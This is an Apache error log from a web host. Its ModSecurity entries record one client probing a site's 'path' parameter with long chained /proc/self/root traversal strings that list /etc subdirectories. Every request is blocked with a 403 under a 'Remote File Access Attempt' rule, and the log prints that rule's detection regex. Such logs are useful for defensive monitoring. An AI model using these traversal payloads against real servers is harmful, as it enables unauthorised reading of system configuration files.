[Wed Mar 18 11:36:10.019614 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:56760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4Wsdf6f5d65gmYZTePQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:11.340487 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:56766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4WwkwaGbbGflqUZAYgAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:13.723863 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:56772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4XeoXxyEfFpUF8f92HQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:15.036866 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:56780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4XwkwaGbbGflqUZAYhAAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:18.515391 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.243.128:56796] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4YkzinOy1jxa1j4cecgAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:20.961118 2026] [mime_magic:error] [pid 19507:tid 140411741927168] (70014)End of file found: [client 57.141.18.96:48562] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:36:21.965939 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:60104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4ZQkwaGbbGflqUZAYjgAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:22.918822 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:60120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4ZuyqAr6etmhZHNrLMgAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:24.495301 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:60134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4aOoXxyEfFpUF8f92JwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:25.999308 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:60136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4adY0UrI5A3LftIy3-wAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:31.935108 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:60148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4bwkwaGbbGflqUZAYlwAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:33.729603 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:53214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4cda6ubjKNq_cu4akbgAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:35.156114 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.243.128:53224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4c-w_le52K8_3pV3oygAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:36.569513 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:53226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4dOoXxyEfFpUF8f92LwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:41.627061 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:53230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4eeyqAr6etmhZHNrLPgAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:44.489523 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:48726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4ewkwaGbbGflqUZAYogAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:45.967039 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:48742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4feyqAr6etmhZHNrLPwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:47.358599 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:48750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4fymAPhZkrhU8w4l2UwAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:49.774272 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:48758] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4geyqAr6etmhZHNrLQQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:52.233842 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:56916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4hNY0UrI5A3LftIy4KwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:54.640710 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:56918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4huw_le52K8_3pV3o0wAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:36:55.979138 2026] [:error] [pid 17653:tid 140411540502272] [client 74.7.243.128:56922] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq4h8df6f5d65gmYZTebAAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
